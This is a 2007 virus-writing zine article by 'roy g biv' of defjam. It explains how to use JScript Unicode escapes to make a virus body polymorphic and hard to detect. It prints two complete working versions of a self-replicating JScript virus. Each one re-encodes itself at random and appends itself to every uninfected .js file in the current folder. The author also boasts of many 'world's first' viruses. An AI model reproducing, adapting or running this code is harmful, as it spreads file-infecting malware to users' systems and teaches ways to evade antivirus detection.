                                Now You See It
                                 Now \u Don't
                              roy g biv / defjam
 
                                 -= defjam =-
                                  since 1992
                     bringing you the viruses of tomorrow
                                    today!


Former  DOS/Win16  virus writer, author of several virus  families,  including
Ginger  (see Coderz #1 zine for terrible buggy example, contact me for  better
sources  ;),  and Virus Bulletin 9/95 for a description of what   they  called
Rainbow.   Co-author  of  world's first virus using circular  partition  trick
(Orsam, coded with Prototype in 1993).  Designer of world's first XMS swapping
virus  (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is
swapped  out).   Author of world's first virus using Thread Local Storage  for
replication  (Shrug, see Virus Bulletin 6/02 for a description, but they  call
it Chiton), world's first virus using Visual Basic 5/6 language extensions for
replication  (OU812), world's first Native executable virus (Chthon),  world's
first  virus  using process co-operation to prevent termination  (Gemini,  see
Virus  Bulletin 9/02 for a description), world's first virus using polymorphic
SMTP  headers (JunkMail, see Virus Bulletin 11/02 for a description),  world's
first viruses that can convert any data files to infectable objects (Pretext),
world's  first  32/64-bit  parasitic  EPO .NET  virus  (Croissant,  see  Virus
Bulletin  11/04  for a description, but they call it Impanate), world's  first
virus  using  self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03  for  a
description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus
Bulletin 6/04 for a description, but they call it Rugrat), world's first virus
for  Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel
IA32  and  AMD  AMD64  (Shrug),  world's  first  viruses  that  infect  Office
applications  and  script  files  using the same  code  (Macaroni,  see  Virus
Bulletin  11/05  for  a description, but they call it Macar),  world's   first
viruses  that  can infect both VBS and JScript using the same code (ACDC,  see
Virus  Bulletin 11/05 for a description, but they call it Cada), world's first
virus  that  can  infect  CHM files (Charm, see Virus  Bulletin  10/06  for  a
description,  but they call it Chamb), world's first IDA plugin virus  (Hidan,
see Virus Bulletin 3/07 for a description), world's first viruses that use the
Microsoft  Script  Encoder  to dynamically encrypt the  virus  body  (Screed),
world's  first virus for StarOffice and OpenOffice (Starbucks), world's  first
virus  IDC  virus (ID10TiC), world's first polymorphic virus for Win64 on  AMD
AMD64  (Boundary, see Virus Bulletin 12/06 for a description, but they call it
Bounds),  and  world's first virus that can infect Intel-format  and  PowerPC-
format Mach-O files (MachoMan, see Virus Bulletin 01/07 for a description, but
they call it Macarena).  Author of various retrovirus articles (eg see Vlad #7
for the strings that make your code invisible to TBScan).  Went to sleep for a
number of years.  This is my sixth virus for JScript.  It is the world's first
virus that uses Unicode escapes to dynamically encrypt the virus body.


What are Unicode escapes?

Some  special characters cannot travel through ASCII gateways properly, so the
solution  is  to encode them using a special ASCII encoding.  This is  usually
required  by  web sites, and is marked by the "%" character.  A more  specific
kind  of  encoding is for characters whose value is larger than 255, which  is
for  non-ISO-8859  characters,  such as Arabic and Hebrew characters.   It  is
marked  by the "\u" sequence.  There is a more detailed description of Unicode
in my United Nations article, which was part of the EfishNC release, but it is
not important right now.

The point is that currently the most common use of "\u" encoding is to deliver
executable  code  for exploit payloads, and this is how I found out about  it.
Since  I'm  a curious person, I wondered if it could be applied to the  script
code itself.  The answer, of course, is yes. :)


Great!  Tell me more!

The  Windows JScript engine converts all scripts to Unicode internally, so  we
must encode our scripts using Unicode escapes.  All escapes must be in little-
endian format.  So, for example, "test" becomes "\u0074\u0065\u0073\u0074".

When  I first tried it, there seemed to be some limitations, though -  certain
elements  cannot  be  encoded.  This includes statements,  operators,  braces,
parentheses,  and numbers.  That is a lot of exceptions, but it still  becomes
polymorphic  enough no-one will be stupid enough to attempt to detect a  virus
based on just those. ;)  Functions can be encoded, and that became very useful
later, but here is the first attempt, must be single line:

;/*Unicycle - roy g biv 01/04/07*/
a=new ActiveXObject("scripting.filesystemobject")
b=a.opentextfile(WScript.scriptfullname).readall()
b=b.substr(b.search(c=/;\/\*Unicycle/))         //remove everything before our code
e=b.substr(0,d=b.search(/\*\//)+2)              //skip comment section
Math.random(f=1)                                //let's make it different every time
while(d<b.length)
{
  if(f&&(((g=b.substr(d,4))=="new ")||g=="else"||g=="for("||g=="try{"||((g=b.substr(d,5))=="while"))||g=="catch"||((g=b.substr(d,2))=="if"))e=e+g
                                                //add statements if not between ""
  else
  {
    if(g=="\\"+"u")b=b.substr(0,d)+eval("'"+b.substr(d,6)+"'")+b.substr(d+6)
                                                //decode "\u" encoding
    g=b.charAt(d)                               //get character
    f^=g=='"'                                   //remember if "
    e=e+(" !\"&'()+,./0124568*;<:=>?{\\^}|".indexOf(g)+1||Math.random()>.5?g:"\\"+"u00"+b.charCodeAt(d).toString(16))
                                                //store character if special, else encode it with 50% chance
  }
  d+=g.length
}
for(d=new Enumerator(a.getfolder(".").files);!d.atEnd();d.moveNext())
                                                //demo version, current directory only
{
  if(a.getextensionname(b=d.item()).toLowerCase()=="js")try
  {
    f=b.attributes
    b.attributes=0
    if(a.opentextfile(b).readall().search(c)<0)a.opentextfile(b,8).write(e)
                                                //append ourselves if not infected already
    b.attributes=f
  }
  catch(z)
  {
  }
}


Second Attempt

I  noticed  that  the characters inside quotes can be encoded  completely,  no
matter  if  they are special or not.  This made me think think about  ways  to
encode  the  whole script without restriction.  Eventually I worked it  out  -
eval().   This  is  also why the ability to encode functions  is  important  -
everything  can  be  encoded,  except  for  the  parentheses  and  the  string
delimiters  of the eval.  There are two special characters that cannot be used
directly.   One  is  the  "\", the other is the string  delimiter.   They  are
special  because  if we want to write "\<char>", it should be  interpreted  as
"<char>".   The  problem is that if the "\" is encoded as "\u005c",  then  the
behaviour  goes wrong, depending on what "<char>" is.  If it is "\", then what
follows  the  second  "\" becomes the escaped character.  If it is the  string
delimiter,  then  the  string will end too soon.  The solution is to  use  the
String.fromCharCode() method instead, and then there is no problem.

This result is this code:

;/*Unicycle - roy g biv 01/04/07*/
eval('
a=new ActiveXObject("scripting.filesystemobject")
b=a.opentextfile(WScript.scriptfullname).readall()
b=b.substr(b.search(c="Unicycle")-3)            //remove everything before our code
e=b.substr(0,d=b.search("biv")+14)              //skip comment section
f=String.fromCharCode(92)                       //"\"
g=String.fromCharCode(39)                       //"'"
Math.random(1)                                  //let's make it different every time
while(d<b.length-2)
{
  if((h=b.substr(d,2))==f+"u")b=b.substr(0,d)+eval(g+b.substr(d,6)+g)+b.substr(d+6)
                                                //decode \u encoding
  e=e+(d==38?h:Math.random()>.5?b.charAt(d--):f+"u00"+b.charCodeAt(d--).toString(16))
                                                //encode all but first "('" with 50% chance
  d+=2
}
for(d=new Enumerator(a.getfolder(".").files);!d.atEnd();d.moveNext())
                                                //demo version, current directory only
{
  if(a.getextensionname(b=d.item()).toLowerCase()=="js")try
  {
    f=b.attributes
    b.attributes=0
    if(a.opentextfile(b).readall().search(c)<0)a.opentextfile(b,8).write(e+g+")")
                                                //append ourselves if not infected already
    b.attributes=f
  }
  catch(z)
  {
  }
}
')


Greets to friendly people (A-Z):

Active - Benny - Malum - Obleak - Prototype - Ratter - Ronin - RT Fishel -
sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna -
VirusBuster - Whitehead


rgb/defjam apr 2007
iam_rgb@hotmail.com
